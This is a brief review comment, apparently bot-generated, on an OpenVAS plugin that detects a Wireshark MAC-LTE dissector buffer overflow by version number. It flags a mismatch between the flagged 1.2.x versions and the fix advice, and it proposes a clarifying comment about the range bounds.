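Review bot: The Fix text in `desc` names only "Wireshark 1.4.3 or later", while the check also flags 1.2.0 through 1.2.13, so a host on the 1.2 branch is told to fix the issue by changing branches. The upper bound of 1.2.13 suggests a fixed 1.2.x release exists; if the referenced wnpa-sec-2011-02 advisory confirms that, the Fix line should name that release alongside 1.4.3. A comment above the two `version_in_range` calls, saying that the bounds are meant as inclusive and are taken from that advisory, would help whoever next updates the ranges.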
Property changes on: trunk/openvas-plugins/scripts/gb_wireshark_mac_lte_dissector_bof_vuln_mac.nasl
___________________________________________________________________
Added: svn:keywords
+ Revision Date Id